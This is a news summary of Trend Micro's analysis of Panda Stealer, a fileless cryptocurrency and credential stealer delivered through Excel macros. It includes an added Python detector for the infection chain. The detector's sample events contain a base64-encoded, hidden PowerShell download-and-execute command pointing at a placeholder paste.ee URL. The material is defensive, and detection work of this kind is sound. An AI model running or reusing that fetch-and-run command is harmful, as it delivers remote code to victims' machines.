Panda Stealer targets cryptocurrency wallets and VPN credentials via malicious XLS attachment
2021-05-11 17:05

Bad actors put a new twist on an existing piece of malware to steal private keys for cryptocurrency accounts and other account credentials, according to analysis from Trend Micro.

Panda Stealer uses a fileless approach and looks for private keys and records of previous transactions from cryptocurrency wallets including Dash, Bytecoin, Litecoin and Ethereum, according to Trend Micro.

The infection starts with an XLSM attachment whose macros download a loader, which in turn executes the stealer.

"Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL."
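The chain quoted above (Office macro, PowerShell fetching from paste.ee, MSBuild.exe used as a hollowing target) leaves a recognisable trail in process-creation telemetry. The following is an added detection example written for this page; it is not code from Trend Micro, Morphisec or the article. It scores constructed Sysmon-style process events against three heuristics drawn from the description: an Office process spawning a script host, a PowerShell command line (including a `-EncodedCommand` payload, which it decodes first) that references paste.ee, and MSBuild.exe started from Office or a script host. The field names, process allow-sets and the sample events are assumptions, and the paste.ee URL in the sample is a placeholder.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Process names involved in the chain described in the article (lower-case image names; assumed sets).
OFFICE_PROCS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PASTE_RE = re.compile(r"paste\.ee", re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell encodes the script as UTF-16LE).
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1-like fields; assumed schema)."""
    image: str         # full path of the created process
    parent_image: str  # full path of the parent process
    cmdline: str       # command line of the created process


def _name(path: str) -> str:
    """Image file name, lower-cased, from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decoded_cmdline(cmdline: str) -> str:
    """Return the command line with a -EncodedCommand payload decoded, else unchanged."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return cmdline


def score_event(ev: ProcEvent) -> list:
    """Return (rule_id, detail) tuples for every heuristic the event trips."""
    hits = []
    img, parent = _name(ev.image), _name(ev.parent_image)
    if parent in OFFICE_PROCS and img in SCRIPT_HOSTS:
        hits.append(("office_spawns_script_host", f"{parent} -> {img}"))
    if img in {"powershell.exe", "pwsh.exe"}:
        text = decoded_cmdline(ev.cmdline)
        if PASTE_RE.search(text):
            hits.append(("powershell_paste_ee", text.strip()))
    # MSBuild.exe is the hollowing target; it is not normally a child of Office or a script host.
    if img == "msbuild.exe" and parent in OFFICE_PROCS | SCRIPT_HOSTS:
        hits.append(("msbuild_suspicious_parent", f"{parent} -> {img}"))
    return hits


def scan(events):
    """Run score_event over a sequence of events; returns (event_index, hit) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in score_event(ev)]


# Constructed sample events (not real telemetry). The paste.ee URL is a placeholder.
_script = "IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/example')"
_enc = base64.b64encode(_script.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
EVENTS = [
    ProcEvent(PS, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              f"powershell.exe -nop -w hidden -enc {_enc}"),
    ProcEvent(MSBUILD, PS, "MSBuild.exe"),
    ProcEvent(MSBUILD, r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
              "MSBuild.exe app.csproj"),
    ProcEvent(PS, r"C:\Windows\explorer.exe", "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for idx, (rule, detail) in scan(EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

Only the first two constructed events trip a rule; the developer-launched MSBuild.exe and the interactive PowerShell session do not. In production the parent allow-sets need tuning per environment, and the paste.ee match should be widened to whatever paste sites the loader is observed using.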

Morphisec's recent analysis also discovered that Panda Stealer has an infection chain that uses the same fileless distribution method as the "Fair" variant of Phobos ransomware to carry out memory-based attacks.

Trend Micro reports that Panda Stealer is a variant of Collector Stealer.


News URL

https://www.techrepublic.com/article/panda-stealer-targets-cryptocurrency-wallets-and-vpn-credentials-via-malicious-xls-attachment/#ftag=RSS56d97e7